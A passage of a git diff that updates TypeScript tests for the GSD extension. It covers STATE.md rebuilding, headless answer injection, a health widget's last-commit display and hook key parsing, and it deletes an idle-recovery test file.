+  const base = mkdtempSync(join(tmpdir(), "gsd-guided-state-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, ".gsd", relativePath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content);
+}
+
+describe("guided-flow STATE.md rebuild (#3475)", () => {
+  let base: string;
+
+  afterEach(() => {
+    closeDatabase();
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("rebuildState writes STATE.md matching derived state, not stale cache", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    // Set up real active milestone M010
+    insertMilestone({ id: "M010", title: "Real Active", status: "active" });
+    insertSlice({ id: "S03", milestoneId: "M010", title: "Slice Three", status: "active", risk: "low", depends: [] });
+    insertTask({ id: "T05", sliceId: "S03", milestoneId: "M010", title: "Task Five", status: "pending" });
+    writeFile(base, "milestones/M010/M010-CONTEXT.md", "# M010: Real Active\n\nReal work here.");
+    writeFile(base, "milestones/M010/M010-ROADMAP.md", "# M010\n\n## Slices\n\n- [ ] **S03: Slice Three**");
+
+    // Write a STALE STATE.md pointing to wrong milestone
+    writeFile(base, "STATE.md", [
+      "# GSD State",
+      "",
+      "**Active Milestone:** M008: Old Queued",
+      "**Active Slice:** None",
+      "**Phase:** pre-planning",
+      "",
+      "## Next Action",
+      "Milestone M008 has a roadmap but no slices defined.",
+    ].join("\n"));
+
+    // Derive state — should return M010
+    invalidateStateCache();
+    const state = await deriveState(base);
+    assert.equal(state.activeMilestone?.id, "M010", "Derived state should be M010");
+
+    // Rebuild STATE.md
+    await rebuildState(base);
+
+    // Read the rebuilt STATE.md
+    const statePath = resolveGsdRootFile(base, "STATE");
+    const rebuilt = readFileSync(statePath, "utf-8");
+
+    // Should contain M010, NOT M008
+    assert.ok(rebuilt.includes("M010"), "Rebuilt STATE.md should reference M010");
+    assert.ok(!rebuilt.includes("M008"), "Rebuilt STATE.md should NOT reference stale M008");
+  });
+
+  test("buildStateMarkdown produces correct active milestone from GSDState", async () => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+
+    insertMilestone({ id: "M070", title: "Current Work", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M070", title: "First Slice", status: "active", risk: "low", depends: [] });
+    writeFile(base, "milestones/M070/M070-CONTEXT.md", "# M070: Current Work");
+    writeFile(base, "milestones/M070/M070-ROADMAP.md", "# M070\n\n## Slices\n\n- [ ] **S01: First Slice**");
+
+    invalidateStateCache();
+    const state = await deriveState(base);
+    const md = buildStateMarkdown(state);
+
+    assert.ok(md.includes("M070"), "State markdown should include active milestone M070");
+    assert.ok(md.includes("Current Work") || md.includes("M070"), "State markdown should include milestone title or ID");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/headless-answers.test.ts b/src/resources/extensions/gsd/tests/headless-answers.test.ts
index e59cc8f83..a6796fc81 100644
--- a/src/resources/extensions/gsd/tests/headless-answers.test.ts
+++ b/src/resources/extensions/gsd/tests/headless-answers.test.ts
@@ -23,7 +23,7 @@ function makeTempDir(prefix: string): string {
 // loadAndValidateAnswerFile
 // ---------------------------------------------------------------------------
 
-test('loadAndValidateAnswerFile — valid file', () => {
+test('loadAndValidateAnswerFile — valid file', (t) => {
   const tmp = makeTempDir('answers-valid');
   try {
     const data = {
@@ -43,7 +43,7 @@ test('loadAndValidateAnswerFile — valid file', () => {
   }
 });
 
-test('loadAndValidateAnswerFile — invalid JSON', () => {
+test('loadAndValidateAnswerFile — invalid JSON', (t) => {
   const tmp = makeTempDir('answers-bad-json');
   try {
     const filePath = join(tmp, 'answers.json');
@@ -58,7 +58,7 @@ test('loadAndValidateAnswerFile — invalid JSON', () => {
   }
 });
 
-test('loadAndValidateAnswerFile — wrong types (non-string question value)', () => {
+test('loadAndValidateAnswerFile — wrong types (non-string question value)', (t) => {
   const tmp = makeTempDir('answers-bad-q');
   try {
     const filePath = join(tmp, 'answers.json');
@@ -73,7 +73,7 @@ test('loadAndValidateAnswerFile — wrong types (non-string question value)', ()
   }
 });
 
-test('loadAndValidateAnswerFile — wrong types (non-string secret value)', () => {
+test('loadAndValidateAnswerFile — wrong types (non-string secret value)', (t) => {
   const tmp = makeTempDir('answers-bad-secret');
   try {
     const filePath = join(tmp, 'answers.json');
@@ -116,7 +116,7 @@ function makeSelectEvent(
   };
 }
 
-test('observeEvent stores metadata', () => {
+test('observeEvent stores metadata', (t) => {
   const injector = new AnswerInjector({});
 
   injector.observeEvent(makeToolExecutionStart([{
@@ -140,7 +140,7 @@ test('observeEvent stores metadata', () => {
   assert.strictEqual(injector.getStats().questionsDefaulted, 1);
 });
 
-test('tryHandle matches by question ID — single select', () => {
+test('tryHandle matches by question ID — single select', (t) => {
   const injector = new AnswerInjector({ questions: { deploy_target: 'GCP' } });
 
   injector.observeEvent(makeToolExecutionStart([{
@@ -164,7 +164,7 @@ test('tryHandle matches by question ID — single select', () => {
   assert.strictEqual(injector.getStats().questionsAnswered, 1);
 });
 
-test('tryHandle unknown question deferred — first_option timeout', async () => {
+test('tryHandle unknown question deferred — first_option timeout', async (t) => {
   const injector = new AnswerInjector({ defaults: { strategy: 'first_option' } });
 
   const captured: string[] = [];
@@ -188,7 +188,7 @@ test('tryHandle unknown question deferred — first_option timeout', async () =>
   assert.strictEqual(injector.getStats().questionsDefaulted, 1);
 });
 
-test('tryHandle multi-select', () => {
+test('tryHandle multi-select', (t) => {
   const injector = new AnswerInjector({ questions: { features: ['auth', 'payments'] } });
 
   injector.observeEvent(makeToolExecutionStart([{
@@ -218,7 +218,7 @@ test('tryHandle multi-select', () => {
   assert.strictEqual(injector.getStats().questionsAnswered, 1);
 });
 
-test('tryHandle answer not in options — first_option strategy returns false', () => {
+test('tryHandle answer not in options — first_option strategy returns false', (t) => {
   const injector = new AnswerInjector({ questions: { deploy_target: 'Azure' } });
 
   injector.observeEvent(makeToolExecutionStart([{
@@ -240,7 +240,7 @@ test('tryHandle answer not in options — first_option strategy returns false',
   assert.strictEqual(injector.getStats().questionsAnswered, 0);
 });
 
-test('tryHandle deferred resolution — observeEvent after tryHandle', async () => {
+test('tryHandle deferred resolution — observeEvent after tryHandle', async (t) => {
   const injector = new AnswerInjector({ questions: { deploy_target: 'GCP' } });
 
   const captured: string[] = [];
@@ -272,7 +272,7 @@ test('tryHandle deferred resolution — observeEvent after tryHandle', async ()
 // AnswerInjector — getSecretEnvVars
 // ---------------------------------------------------------------------------
 
-test('getSecretEnvVars returns secrets map', () => {
+test('getSecretEnvVars returns secrets map', (t) => {
   const secrets = { API_KEY: 'sk-123', DB_URL: 'postgres://localhost/db' };
   const injector = new AnswerInjector({ secrets });
 
@@ -283,7 +283,7 @@ test('getSecretEnvVars returns secrets map', () => {
 // AnswerInjector — getUnusedWarnings
 // ---------------------------------------------------------------------------
 
-test('getUnusedWarnings reports unused question IDs and secret keys', () => {
+test('getUnusedWarnings reports unused question IDs and secret keys', (t) => {
   const injector = new AnswerInjector({
     questions: { q1: 'val1', q2: 'val2' },
     secrets: { KEY1: 'v1' },
@@ -314,7 +314,7 @@ test('getUnusedWarnings reports unused question IDs and secret keys', () => {
 // AnswerInjector — defaults.strategy cancel
 // ---------------------------------------------------------------------------
 
-test('defaults.strategy cancel — sends cancelled response', () => {
+test('defaults.strategy cancel — sends cancelled response', (t) => {
   const injector = new AnswerInjector({ defaults: { strategy: 'cancel' } });
 
   injector.observeEvent(makeToolExecutionStart([{
diff --git a/src/resources/extensions/gsd/tests/health-widget.test.ts b/src/resources/extensions/gsd/tests/health-widget.test.ts
index fc4898af7..88985af58 100644
--- a/src/resources/extensions/gsd/tests/health-widget.test.ts
+++ b/src/resources/extensions/gsd/tests/health-widget.test.ts
@@ -6,8 +6,10 @@ import { tmpdir } from "node:os";
 import {
   buildHealthLines,
   detectHealthWidgetProjectState,
+  formatRelativeTime,
   type HealthWidgetData,
 } from "../health-widget-core.ts";
+import { registerHooks } from "../bootstrap/register-hooks.ts";
 
 function makeTempDir(prefix: string): string {
   const dir = join(
@@ -34,66 +36,62 @@ function activeData(overrides: Partial<HealthWidgetData> = {}): HealthWidgetData
     providerIssue: null,
     environmentErrorCount: 0,
     environmentWarningCount: 0,
+    lastCommitEpoch: null,
+    lastCommitMessage: null,
     lastRefreshed: Date.now(),
     ...overrides,
   };
 }
 
-test("detectHealthWidgetProjectState: no .gsd returns none", () => {
+test("detectHealthWidgetProjectState: no .gsd returns none", (t) => {
   const dir = makeTempDir("none");
-  try {
-    assert.equal(detectHealthWidgetProjectState(dir), "none");
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  assert.equal(detectHealthWidgetProjectState(dir), "none");
 });
 
-test("detectHealthWidgetProjectState: bootstrapped .gsd without milestones returns initialized", () => {
+test("detectHealthWidgetProjectState: bootstrapped .gsd without milestones returns initialized", (t) => {
   const dir = makeTempDir("initialized");
-  try {
-    mkdirSync(join(dir, ".gsd"), { recursive: true });
-    assert.equal(detectHealthWidgetProjectState(dir), "initialized");
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  assert.equal(detectHealthWidgetProjectState(dir), "initialized");
 });
 
-test("detectHealthWidgetProjectState: milestone without metrics returns active", () => {
+test("detectHealthWidgetProjectState: milestone without metrics returns active", (t) => {
   const dir = makeTempDir("active");
-  try {
-    mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
-    assert.equal(detectHealthWidgetProjectState(dir), "active");
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => { cleanup(dir); });
+
+  mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
+  assert.equal(detectHealthWidgetProjectState(dir), "active");
 });
 
-test("buildHealthLines: none state shows onboarding copy", () => {
+test("buildHealthLines: none state shows onboarding copy", (t) => {
   assert.deepEqual(buildHealthLines(activeData({ projectState: "none" })), [
     "  GSD  No project loaded — run /gsd to start",
   ]);
 });
 
-test("buildHealthLines: initialized state shows continue setup copy", () => {
+test("buildHealthLines: initialized state shows continue setup copy", (t) => {
   assert.deepEqual(buildHealthLines(activeData({ projectState: "initialized" })), [
     "  GSD  Project initialized — run /gsd to continue setup",
   ]);
 });
 
-test("buildHealthLines: active state with ledger-driven spend shows spent summary", () => {
+test("buildHealthLines: active state with ledger-driven spend shows spent summary", (t) => {
   const lines = buildHealthLines(activeData({ budgetSpent: 0.42 }));
   assert.equal(lines.length, 1);
   assert.match(lines[0]!, /● System OK/);
   assert.match(lines[0]!, /Spent: 42\.0¢/);
 });
 
-test("buildHealthLines: active state with budget ceiling shows percent summary", () => {
+test("buildHealthLines: active state with budget ceiling shows percent summary", (t) => {
   const lines = buildHealthLines(activeData({ budgetSpent: 2.5, budgetCeiling: 10 }));
   assert.equal(lines.length, 1);
   assert.match(lines[0]!, /Budget: \$2\.50\/\$10\.00 \(25%\)/);
 });
 
-test("buildHealthLines: active state with issues reports issue summary", () => {
+test("buildHealthLines: active state with issues reports issue summary", (t) => {
   const lines = buildHealthLines(activeData({
     providerIssue: "✗ OpenAI key missing",
     environmentErrorCount: 1,
@@ -104,17 +102,123 @@ test("buildHealthLines: active state with issues reports issue summary", () => {
   assert.match(lines[0]!, /Env: 1 error/);
 });
 
-test("detectHealthWidgetProjectState: metrics file alone does not imply project", () => {
-  const dir = makeTempDir("metrics-only");
-  try {
-    mkdirSync(join(dir, ".gsd"), { recursive: true });
-    writeFileSync(
-      join(dir, ".gsd", "metrics.json"),
-      JSON.stringify({ version: 1, projectStartedAt: Date.now(), units: [] }),
-      "utf-8",
-    );
-    assert.equal(detectHealthWidgetProjectState(dir), "initialized");
-  } finally {
-    cleanup(dir);
-  }
+// ── Last commit display ──────────────────────────────────────────────────
+
+test("buildHealthLines: shows last commit with relative time and message", (t) => {
+  const epoch = Math.floor(Date.now() / 1000) - 300; // 5 minutes ago
+  const lines = buildHealthLines(activeData({
+    lastCommitEpoch: epoch,
+    lastCommitMessage: "feat(widget): add health display",
+  }));
+  assert.equal(lines.length, 1);
+  assert.match(lines[0]!, /Last commit: 5m ago/);
+  assert.match(lines[0]!, /feat\(widget\): add health display/);
+});
+
+test("buildHealthLines: truncates long commit messages", (t) => {
+  const epoch = Math.floor(Date.now() / 1000) - 60;
+  const longMsg = "a".repeat(80);
+  const lines = buildHealthLines(activeData({
+    lastCommitEpoch: epoch,
+    lastCommitMessage: longMsg,
+  }));
+  assert.equal(lines.length, 1);
+  assert.match(lines[0]!, /a{49}…/);
+  assert.ok(!lines[0]!.includes("a".repeat(51)), "message is truncated");
+});
+
+test("buildHealthLines: no last commit section when epoch is null", (t) => {
+  const lines = buildHealthLines(activeData({ lastCommitEpoch: null }));
+  assert.equal(lines.length, 1);
+  assert.ok(!lines[0]!.includes("Last commit"), "no last commit when null");
+});
+
+test("buildHealthLines: last commit without message shows only time", (t) => {
+  const epoch = Math.floor(Date.now() / 1000) - 3600; // 1 hour ago
+  const lines = buildHealthLines(activeData({
+    lastCommitEpoch: epoch,
+    lastCommitMessage: null,
+  }));
+  assert.equal(lines.length, 1);
+  assert.match(lines[0]!, /Last commit: 1h ago/);
+  assert.ok(!lines[0]!.includes(" — "), "no dash separator when no message");
+});
+
+// ── formatRelativeTime ───────────────────────────────────────────────────
+
+test("formatRelativeTime: just now for <60s", () => {
+  const epoch = Math.floor(Date.now() / 1000) - 30;
+  assert.equal(formatRelativeTime(epoch), "just now");
+});
+
+test("formatRelativeTime: minutes", () => {
+  const epoch = Math.floor(Date.now() / 1000) - 300;
+  assert.equal(formatRelativeTime(epoch), "5m ago");
+});
+
+test("formatRelativeTime: hours", () => {
+  const epoch = Math.floor(Date.now() / 1000) - 7200;
+  assert.equal(formatRelativeTime(epoch), "2h ago");
+});
+
+test("formatRelativeTime: days", () => {
+  const epoch = Math.floor(Date.now() / 1000) - 172800;
+  assert.equal(formatRelativeTime(epoch), "2d ago");
+});
+
+test("detectHealthWidgetProjectState: metrics file alone does not imply project", (t) => {
+  const dir = makeTempDir("metrics-only");
+  t.after(() => { cleanup(dir); });
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(
+    join(dir, ".gsd", "metrics.json"),
+    JSON.stringify({ version: 1, projectStartedAt: Date.now(), units: [] }),
+    "utf-8",
+  );
+  assert.equal(detectHealthWidgetProjectState(dir), "initialized");
+});
+
+test("session_start bootstraps the health widget alongside notifications", async (t) => {
+  const dir = makeTempDir("bootstrap");
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+
+  const originalCwd = process.cwd();
+  process.chdir(dir);
+  t.after(() => {
+    process.chdir(originalCwd);
+    cleanup(dir);
+  });
+
+  const widgets: string[] = [];
+  const handlers = new Map<string, (event: unknown, ctx: any) => Promise<void> | void>();
+  const pi = {
+    on(event: string, handler: (event: unknown, ctx: any) => Promise<void> | void) {
+      handlers.set(event, handler);
+    },
+  } as any;
+
+  registerHooks(pi);
+  const sessionStart = handlers.get("session_start");
+  assert.ok(sessionStart, "session_start handler is registered");
+
+  await sessionStart!({}, {
+    hasUI: true,
+    ui: {
+      notify: () => {},
+      setStatus: () => {},
+      setWorkingMessage: () => {},
+      onTerminalInput: () => () => {},
+      setWidget: (key: string) => {
+        widgets.push(key);
+      },
+    },
+    sessionManager: {
+      getSessionId: () => null,
+    },
+    model: null,
+  } as any);
+
+  assert.ok(widgets.includes("gsd-health"), "health widget is bootstrapped");
+  assert.ok(widgets.includes("gsd-notifications"), "notification widget still boots");
 });
diff --git a/src/resources/extensions/gsd/tests/hook-key-parsing.test.ts b/src/resources/extensions/gsd/tests/hook-key-parsing.test.ts
new file mode 100644
index 000000000..42424ad50
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/hook-key-parsing.test.ts
@@ -0,0 +1,107 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+/**
+ * Regression tests for #2826: hook/* completed-unit keys were parsed
+ * incorrectly by forensics + doctor, causing false-positive missing-artifact
+ * errors for all hook units.
+ *
+ * The root cause: `key.indexOf("/")` splits "hook/telegram-progress/M007/S01"
+ * into unitType="hook" + unitId="telegram-progress/M007/S01" instead of
+ * unitType="hook/telegram-progress" + unitId="M007/S01".
+ */
+
+describe("splitCompletedKey (#2826)", () => {
+  it("is exported from forensics.ts", () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    assert.ok(
+      source.includes("export function splitCompletedKey"),
+      "forensics.ts must export splitCompletedKey helper",
+    );
+  });
+
+  it("splits simple unit types correctly", async () => {
+    const { splitCompletedKey } = await import("../forensics.ts");
+    const result = splitCompletedKey("execute-task/M007/S01/T01");
+    assert.deepStrictEqual(result, {
+      unitType: "execute-task",
+      unitId: "M007/S01/T01",
+    });
+  });
+
+  it("splits hook unit types preserving the compound hook/<hookName> prefix", async () => {
+    const { splitCompletedKey } = await import("../forensics.ts");
+    const result = splitCompletedKey("hook/telegram-progress/M007/S01");
+    assert.deepStrictEqual(result, {
+      unitType: "hook/telegram-progress",
+      unitId: "M007/S01",
+    });
+  });
+
+  it("splits hook unit types with task-level unitId", async () => {
+    const { splitCompletedKey } = await import("../forensics.ts");
+    const result = splitCompletedKey("hook/telegram-progress/M007/S02/T01");
+    assert.deepStrictEqual(result, {
+      unitType: "hook/telegram-progress",
+      unitId: "M007/S02/T01",
+    });
+  });
+
+  it("returns null for malformed keys without a slash", async () => {
+    const { splitCompletedKey } = await import("../forensics.ts");
+    assert.strictEqual(splitCompletedKey("noslash"), null);
+  });
+
+  it("returns null for malformed hook keys with only 'hook/' and no more segments", async () => {
+    const { splitCompletedKey } = await import("../forensics.ts");
+    // "hook/someName" has no unitId segment after the hook name
+    assert.strictEqual(splitCompletedKey("hook/someName"), null);
+  });
+});
+
+describe("forensics detectMissingArtifacts uses splitCompletedKey (#2826)", () => {
+  it("does not use indexOf for key splitting", () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    // Extract only the detectMissingArtifacts function body
+    const fnStart = source.indexOf("function detectMissingArtifacts");
+    assert.ok(fnStart !== -1, "detectMissingArtifacts must exist");
+    const fnBody = source.slice(fnStart, source.indexOf("\n}\n", fnStart) + 3);
+
+    assert.ok(
+      !fnBody.includes('key.indexOf("/")'),
+      "detectMissingArtifacts must not use key.indexOf('/') — use splitCompletedKey instead",
+    );
+    assert.ok(
+      fnBody.includes("splitCompletedKey"),
+      "detectMissingArtifacts must use splitCompletedKey helper",
+    );
+  });
+});
+
+describe("doctor-runtime-checks uses splitCompletedKey (#2826)", () => {
+  it("does not use indexOf for key splitting in orphaned-key check", () => {
+    const source = readFileSync(
+      join(gsdDir, "doctor-runtime-checks.ts"),
+      "utf-8",
+    );
+    // Find the orphaned completed-units section
+    const sectionStart = source.indexOf("Orphaned completed-units");
+    assert.ok(sectionStart !== -1, "orphaned completed-units section must exist");
+    const sectionBody = source.slice(sectionStart, source.indexOf("} catch", sectionStart));
+
+    assert.ok(
+      !sectionBody.includes('key.indexOf("/")'),
+      "doctor orphaned-key check must not use key.indexOf('/') — use splitCompletedKey instead",
+    );
+    assert.ok(
+      sectionBody.includes("splitCompletedKey"),
+      "doctor orphaned-key check must use splitCompletedKey helper",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/idle-recovery.test.ts b/src/resources/extensions/gsd/tests/idle-recovery.test.ts
deleted file mode 100644
index 8c52f2a3f..000000000
--- a/src/resources/extensions/gsd/tests/idle-recovery.test.ts
+++ /dev/null
@@ -1,485 +0,0 @@
-import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync, existsSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import { execSync } from "node:child_process";
-import {
-  resolveExpectedArtifactPath,
-  writeBlockerPlaceholder,
-  skipExecuteTask,
-  verifyExpectedArtifact,
-  buildLoopRemediationSteps,
-} from "../auto.ts";
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
-function createFixtureBase(): string {
-  const base = mkdtempSync(join(tmpdir(), "gsd-idle-recovery-test-"));
-  mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks"), { recursive: true });
-  return base;
-}
-
-function cleanup(base: string): void {
-  rmSync(base, { recursive: true, force: true });
-}
-
-// ═══ resolveExpectedArtifactPath ═════════════════════════════════════════════
-
-{
-  console.log("\n=== resolveExpectedArtifactPath: research-milestone ===");
-  const base = createFixtureBase();
-  try {
-    const result = resolveExpectedArtifactPath("research-milestone", "M001", base);
-    assertTrue(result !== null, "should resolve a path");
-    assertTrue(result!.endsWith("M001-RESEARCH.md"), `path should end with M001-RESEARCH.md, got ${result}`);
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== resolveExpectedArtifactPath: plan-milestone ===");
-  const base = createFixtureBase();
-  try {
-    const result = resolveExpectedArtifactPath("plan-milestone", "M001", base);
-    assertTrue(result !== null, "should resolve a path");
-    assertTrue(result!.endsWith("M001-ROADMAP.md"), `path should end with M001-ROADMAP.md, got ${result}`);
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== resolveExpectedArtifactPath: research-slice ===");
-  const base = createFixtureBase();
-  try {
-    const result = resolveExpectedArtifactPath("research-slice", "M001/S01", base);
-    assertTrue(result !== null, "should resolve a path");
-    assertTrue(result!.endsWith("S01-RESEARCH.md"), `path should end with S01-RESEARCH.md, got ${result}`);
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== resolveExpectedArtifactPath: plan-slice ===");
-  const base = createFixtureBase();
-  try {
-    const result = resolveExpectedArtifactPath("plan-slice", "M001/S01", base);
-    assertTrue(result !== null, "should resolve a path");
-    assertTrue(result!.endsWith("S01-PLAN.md"), `path should end with S01-PLAN.md, got ${result}`);
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== resolveExpectedArtifactPath: complete-milestone ===");
-  const base = createFixtureBase();
-  try {
-    const result = resolveExpectedArtifactPath("complete-milestone", "M001", base);
-    assertTrue(result !== null, "should resolve a path");
-    assertTrue(result!.endsWith("M001-SUMMARY.md"), `path should end with M001-SUMMARY.md, got ${result}`);
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== resolveExpectedArtifactPath: unknown unit type → null ===");
-  const base = createFixtureBase();
-  try {
-    const result = resolveExpectedArtifactPath("unknown-type", "M001/S01", base);
-    assertEq(result, null, "unknown type returns null");
-  } finally {
-    cleanup(base);
-  }
-}
-
-// ═══ writeBlockerPlaceholder ═════════════════════════════════════════════════
-
-{
-  console.log("\n=== writeBlockerPlaceholder: writes file for research-slice ===");
-  const base = createFixtureBase();
-  try {
-    const result = writeBlockerPlaceholder("research-slice", "M001/S01", base, "idle recovery exhausted 2 attempts");
-    assertTrue(result !== null, "should return relative path");
-    const absPath = resolveExpectedArtifactPath("research-slice", "M001/S01", base)!;
-    assertTrue(existsSync(absPath), "file should exist on disk");
-    const content = readFileSync(absPath, "utf-8");
-    assertTrue(content.includes("BLOCKER"), "should contain BLOCKER heading");
-    assertTrue(content.includes("idle recovery exhausted 2 attempts"), "should contain the reason");
-    assertTrue(content.includes("research-slice"), "should mention the unit type");
-    assertTrue(content.includes("M001/S01"), "should mention the unit ID");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== writeBlockerPlaceholder: creates directory if missing ===");
-  const base = mkdtempSync(join(tmpdir(), "gsd-idle-recovery-test-"));
-  try {
-    // Only create milestone dir, not slice dir
-    mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
-    // resolveSlicePath needs the slice dir to exist to resolve, so this should return null
-    const result = writeBlockerPlaceholder("research-slice", "M001/S01", base, "test reason");
-    // Since the slice dir doesn't exist, resolveExpectedArtifactPath returns null
-    assertEq(result, null, "returns null when directory structure doesn't exist");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== writeBlockerPlaceholder: writes file for research-milestone ===");
-  const base = createFixtureBase();
-  try {
-    const result = writeBlockerPlaceholder("research-milestone", "M001", base, "hard timeout");
-    assertTrue(result !== null, "should return relative path");
-    const absPath = resolveExpectedArtifactPath("research-milestone", "M001", base)!;
-    assertTrue(existsSync(absPath), "file should exist on disk");
-    const content = readFileSync(absPath, "utf-8");
-    assertTrue(content.includes("BLOCKER"), "should contain BLOCKER heading");
-    assertTrue(content.includes("hard timeout"), "should contain the reason");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== writeBlockerPlaceholder: unknown type → null ===");
-  const base = createFixtureBase();
-  try {
-    const result = writeBlockerPlaceholder("unknown-type", "M001/S01", base, "test");
-    assertEq(result, null, "unknown type returns null");
-  } finally {
-    cleanup(base);
-  }
-}
-
-// ═══ skipExecuteTask ═════════════════════════════════════════════════════════
-
-{
-  console.log("\n=== skipExecuteTask: writes summary and checks plan checkbox ===");
-  const base = createFixtureBase();
-  try {
-    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
-    writeFileSync(planPath, [
-      "# S01: Test Slice",
-      "",
-      "## Tasks",
-      "",
-      "- [ ] **T01: First task** `est:10m`",
-      "  Do the first thing.",
-      "- [ ] **T02: Second task** `est:15m`",
-      "  Do the second thing.",
-    ].join("\n"), "utf-8");
-
-    const result = skipExecuteTask(
-      base, "M001", "S01", "T01",
-      { summaryExists: false, taskChecked: false },
-      "idle", 2,
-    );
-
-    assertTrue(result === true, "should return true");
-
-    // Check summary was written
-    const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
-    assertTrue(existsSync(summaryPath), "task summary should exist");
-    const summaryContent = readFileSync(summaryPath, "utf-8");
-    assertTrue(summaryContent.includes("BLOCKER"), "summary should contain BLOCKER");
-    assertTrue(summaryContent.includes("T01"), "summary should mention task ID");
-
-    // Check plan checkbox was marked
-    const planContent = readFileSync(planPath, "utf-8");
-    assertTrue(planContent.includes("- [x] **T01:"), "T01 should be checked");
-    assertTrue(planContent.includes("- [ ] **T02:"), "T02 should remain unchecked");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== skipExecuteTask: skips summary if already exists ===");
-  const base = createFixtureBase();
-  try {
-    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
-    writeFileSync(planPath, "- [ ] **T01: Task** `est:10m`\n", "utf-8");
-
-    // Pre-write a summary
-    const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
-    writeFileSync(summaryPath, "# Real summary\nActual work done.", "utf-8");
-
-    const result = skipExecuteTask(
-      base, "M001", "S01", "T01",
-      { summaryExists: true, taskChecked: false },
-      "idle", 2,
-    );
-
-    assertTrue(result === true, "should return true");
-
-    // Summary should be untouched (not overwritten with blocker)
-    const content = readFileSync(summaryPath, "utf-8");
-    assertTrue(content.includes("Real summary"), "original summary should be preserved");
-    assertTrue(!content.includes("BLOCKER"), "should not contain BLOCKER");
-
-    // Plan checkbox should still be marked
-    const planContent = readFileSync(planPath, "utf-8");
-    assertTrue(planContent.includes("- [x] **T01:"), "T01 should be checked");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== skipExecuteTask: skips checkbox if already checked ===");
-  const base = createFixtureBase();
-  try {
-    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
-    writeFileSync(planPath, "- [x] **T01: Task** `est:10m`\n", "utf-8");
-
-    const result = skipExecuteTask(
-      base, "M001", "S01", "T01",
-      { summaryExists: false, taskChecked: true },
-      "idle", 2,
-    );
-
-    assertTrue(result === true, "should return true");
-
-    // Summary should be written (since summaryExists was false)
-    const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
-    assertTrue(existsSync(summaryPath), "task summary should exist");
-
-    // Plan checkbox should be untouched
-    const planContent = readFileSync(planPath, "utf-8");
-    assertTrue(planContent.includes("- [x] **T01:"), "T01 should remain checked");
-  } finally {
-    cleanup(base);
-  }
-}
-
-{
-  console.log("\n=== skipExecuteTask: handles special regex chars in task ID ===");
-  const base = createFixtureBase();
-  try {
-    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
-    writeFileSync(planPath, "- [ ] **T01.1: Sub-task** `est:10m`\n", "utf-8");
-
-    const result = skipExecuteTask(
-      base, "M001", "S01", "T01.1",
-      { summaryExists: false, taskChecked: false },
-      "idle", 2,
-    );
-
-    assertTrue(result === true, "should return true");
-
-    const planContent = readFileSync(planPath, "utf-8");
-    assertTrue(planContent.includes("- [x] **T01.1:"), "T01.1 should be checked (regex chars escaped)");
-  } finally {
-    cleanup(base);
-  }
-}
-
-// ═══ verifyExpectedArtifact: complete-slice roadmap check ════════════════════
-// Regression for #indefinite-hang: complete-slice must verify roadmap [x] or
-// the idempotency skip loops forever after a crash that wrote SUMMARY+UAT but
-// did not mark the roadmap done.
-
-const ROADMAP_INCOMPLETE = `# M001: Test Milestone
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\`
-> After this: something works
-`;
-
-const ROADMAP_COMPLETE = `# M001: Test Milestone
-
-## Slices
-
-- [x] **S01: Test Slice** \`risk:low\`
-> After this: something works
-`;
-
-{
-  console.log("\n=== verifyExpectedArtifact: complete-slice — all artifacts present + roadmap marked [x] returns true ===");
-  const base = createFixtureBase();
-  try {
